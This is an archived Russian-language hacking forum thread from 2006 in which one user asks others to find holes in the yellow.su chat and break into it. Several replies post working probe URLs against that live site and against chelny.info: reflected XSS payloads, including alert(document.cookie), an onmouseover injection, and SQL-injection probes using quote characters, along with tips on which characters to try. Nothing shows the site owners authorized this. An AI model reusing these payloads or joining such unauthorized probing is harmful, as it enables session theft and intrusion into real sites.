yellow.su нереально взломать многие пытаються кто сможе узнайте дыры [Архив]

Просмотр полной версии : yellow.su нереально взломать многие пытаються кто сможе узнайте дыры

robot410

30.11.2006, 13:11

Узнайте пожалуста дыры в это чате )) а может кто и взломает ОТБЛАГОДАРЮ

alextoun

30.11.2006, 14:22

чат сто пудово самописный, стока там наверченно, щаз глянем!
и ваще! надо блин зарегать несколько ников, а то лень регаться

gemaglabin

30.11.2006, 14:49

http://www.yellow.su/sys/index.phtml?str=top&sel_by=1&expar[0]=3&gender='&nick=&by=0

VampiRUS

30.11.2006, 15:02

http://www.yellow.su/sys/registration.phtml?nick=%22%3E%3Cscript%3Ealert()% 3C/script%3E
http://www.yellow.su/sys/index.phtml просто ошибка вылезает
http://www.yellow.su/?act=room&sid=7466918146&room=4'
уже другая ошибка
http://yellow.su/?act=room&sid=8105585192&room=55

gemaglabin

30.11.2006, 15:12

Хы я так понял то админ чата %)

http://www.yellow.su/sys/registration.phtml?nick=script%3E%3Cscript%3Ealert (document.cookie)%3C/script%3E
http://www.chelny.info/price3.phtml?check_net=&check_email='&check_zip='&check_credit='&check_map='&find1=&selhref=&selpost=&city='&kateg1=%FD18&kateg2='&page='

VampiRUS

30.11.2006, 15:17

http://www.yellow.su/obzor.php?doc=chelny&page=1%3Cscript%3Ealert()%3C/script%3E

$n@ke

30.11.2006, 15:20

Да там вабде ПОПА!!)) я за 10 минут, пока чай пил, стока накалупал..а есиб дальше...аж страшно плин!

символы для скул: '",%00',%27 и т.д. )) к нику, полу ,возрасту...похрен ))

http://www.yellow.su:80/sys/?str=top&sel_by=1&expar%5B0%5D=>"><ScRiPt%20%0a%0d>alert(1)%3B</ScRiPt>&gender=%2527&nick=777-666-1999popa@vasya.ru&by=0

$n@ke

30.11.2006, 15:23

2 gemaglabin
Верняк)) я тож так понял))

http://www.yellow.su:80/sys/?str=top&sel_by=1&expar%5B0%5D=0&gender=%2527&nick="+onmouseover="alert(1141737531)&by=0

круто выглядит))

VampiRUS

30.11.2006, 15:30

http://www.yellow.su/sys/left.phtml?&expar[0]=%22%3E%3Cscript%3Ealert()%3C/script%3E&sid=1425734781
наверное там ещё куча чего но мне надоело

нет вот последняя))
http://www.yellow.su/sys/grpwork.phtml?expar[1]=1&sid=1425734781&expar[2]=322575'

$n@ke

30.11.2006, 15:36

Слышь, топик стартер, запусти сканер какой нить - и смари!!!
А то мы тему во флудилку превратим))) одна дыра за другой....
Так ты реальна админ?

DRON-ANARCHY

01.12.2006, 13:20

Топикстартер, походу, таким своеобразным способом решил привлечь людей к поиску уязвимостей...

.Slip

01.12.2006, 13:36

Щас наверно топикстартер побежал перед админом выламыватся, что это он всё нашёл. Хотя я могу и ошибатся. В общем уязвимости нашли, тема закрыта.